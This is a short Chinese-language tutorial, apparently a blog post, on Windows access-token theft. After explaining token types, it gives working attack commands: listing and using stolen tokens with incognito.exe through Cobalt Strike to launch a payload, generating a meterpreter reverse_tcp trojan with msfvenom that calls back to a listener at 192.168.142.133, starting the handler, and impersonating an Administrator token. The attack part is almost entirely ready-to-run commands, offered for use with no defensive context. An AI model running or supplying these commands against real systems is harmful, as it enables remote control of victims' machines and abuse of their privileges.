Windows令牌窃取攻击目录

  • Windows令牌窃取攻击
    • 一、Windows令牌
    • 二、令牌窃取攻击
      • 1、通过CS进行令牌攻击
      • 2、通过msf进行令牌攻击

一、Windows令牌

令牌(Token)是系统的临时密钥,相当于账户名和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的,它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌持续存在系统中,除非系统重新启动。Windows令牌种类:(1)访问令牌(Access Token)表示访问控制操作主题的系统对象(2)会话令牌(Session Token)是交互会话中唯一的身份标识符(3)保密令牌(Security Token)又叫认证令牌或硬件令牌,是一种计算机身份校验的物理设备Windows访问令牌又分为:(1)授权令牌(Delegation Token),也叫主令牌,支持交互式会话登录(例如本地用户登录、远程桌面登录)(2)模拟令牌(Impresonation Token)支持非交互的会话(例如使用 net use访问共享文件夹)

二、令牌窃取攻击

前提:拿到的用户是过了UAC的管理员

1、通过CS进行令牌攻击

(1)通过CS控制了一个过了UAC的管理员

(2)列出用户的令牌

shell incognito.exe list_tokens -u

(3)使用窃取的令牌进行上线

shell incognito.exe execute -c "XB\Administrator" C:\Users\test\Desktop\win10-3\can.exe

2、通过msf进行令牌攻击

(1)通过msfvenom生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.133 lport=4567 -f exe -o payload.exe

(2)进入msfconsole进行监听

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.142.133set lport 4567run

(3)加载incognito,进行令牌攻击

load incognito                   #加载incognitolist_tokens -u                    #列举令牌impersonate_token "XB\Administrator" #令牌攻击rev2self 或 drop_token                  #返回之前token